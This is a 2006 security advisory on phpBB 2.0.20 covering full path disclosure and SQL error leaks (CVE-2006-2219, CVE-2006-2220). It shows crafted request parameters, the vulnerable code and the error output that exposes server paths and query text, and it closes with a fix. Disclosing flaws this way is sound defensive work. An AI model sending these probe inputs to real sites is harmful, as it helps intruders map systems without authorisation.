|
-----BEGIN PGP SIGNED MESSAGE-----=0D
Hash: SHA1=0D
=0D
[phpBB 2.0.20 Full Path Disclosure and SQL Errors]=0D
=0D
Author: Maksymilian Arciemowicz (cXIb8O3)=0D
Date:=0D
- -Written: 1.5.2006=0D
- -Public: 5.5.2006=0D
=0D
from SecurityReason.Com=0D
CVE:=0D
- - CVE-2006-2219 Full Path Disclosure=0D
- - CVE-2006-2220 Sql Errors=0D
=0D
- --- 0.Description ---=0D
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a=0D
=0D
user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP=0D
=0D
server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal=0D
=0D
free community solution for all web sites.=0D
Contact with author http://www.phpbb.com/about.php.=0D
=0D
- --- 1. Full Path Disclosure ---=0D
Many scripts, for example phpBB, have a basic bug. It exists in variables, which are being inserted into script, into specific functions. For example function htmlspecialchars()=0D
=0D
...=0D
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|ls", &str, &str_len, "e_style, &hint_charset, &hint_charset_len) == FAILURE) {=0D
return;=0D
}=0D
...=0D
=0D
As you can see there is a protection from formatting input variable. If the variable is other than string, we have error with Full Path Disclosure.=0D
=0D
Example:=0D
=0D
http://[HOST]/2020/phpBB2/memberlist.php?mode[]=cx=0D
=0D
- ---Code ---=0D
if ( isset($HTTP_GET_VARS['mode']) || isset($HTTP_POST_VARS['mode']) )=0D
{=0D
$mode = ( isset($HTTP_POST_VARS['mode']) ) ? htmlspecialchars($HTTP_POST_VARS['mode']) : htmlspecialchars($HTTP_GET_VARS['mode']);=0D
}=0D
else=0D
{=0D
$mode = 'joined';=0D
}=0D
- ---Code ---=0D
=0D
- ---Result ---=0D
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/memberlist.php on line 40=0D
=0D
Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 483=0D
=0D
Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 485=0D
=0D
Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 486=0D
- ---Result ---=0D
=0D
http://[HOST]/2020/phpBB2/viewtopic.php?t=2&highlight[]=cx=0D
=0D
- ---Result ---=0D
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line 487=0D
=0D
Warning: urlencode() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line 498=0D
=0D
Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 483=0D
=0D
Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 485=0D
=0D
Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 486=0D
- ---Result ---=0D
=0D
Problem appears if display_errors==1, but it exists on many websites. (even at php.net).=0D
=0D
- --- 2. Sql Errors ---=0D
=0D
Problem appears because we can add everything (INT) to the end of SQL query (LIMIT). The query will fail if the value is below 0 or above -2^32.=0D
=0D
Example:=0D
=0D
http://[HOST]/2020/phpBB2/memberlist.php?start=-1=0D
=0D
- ---Code ---=0D
$start = ( isset($HTTP_GET_VARS['start']) ) ? intval($HTTP_GET_VARS['start']) : 0;=0D
- ---Code ---=0D
=0D
- ---Result ---=0D
Could not query users=0D
=0D
DEBUG MODE=0D
=0D
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 50' at line 4=0D
=0D
SELECT username, user_id, user_viewemail, user_posts, user_regdate, user_from, user_website, user_email, user_icq, user_aim, user_yim, user_msnm, user_avatar, user_avatar_type, user_allowavatar FROM phpbb_users WHERE user_id <> -1 ORDER BY user_regdate ASC LIMIT -1, 50=0D
=0D
Line : 151=0D
File : memberlist.php=0D
- ---Result ---=0D
=0D
- --- 3. How to fix ---=0D
Turn off display_errors or use function like is_string().=0D
=0D
- --- 4. Greets ---=0D
sp3x=0D
=0D
Infospec, p_e_a, krasza, revival, l5x=0D
=0D
- --- 5. Contact ---=0D
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]=0D
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com=0D
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg=0D
SecurityReason.Com=0D
-----BEGIN PGP SIGNATURE-----=0D
Version: GnuPG v1.4.2.2 (FreeBSD)=0D
=0D
iD8DBQFEW4pi3Ke13X/fTO4RAqV7AJ9PeZ9nbRUYATqArEzLOdenG1ypHwCguPa5=0D
7DlqP3M3vq1frb7Zc3y+KrU==0D
=4U6Y=0D
-----END PGP SIGNATURE-----=0D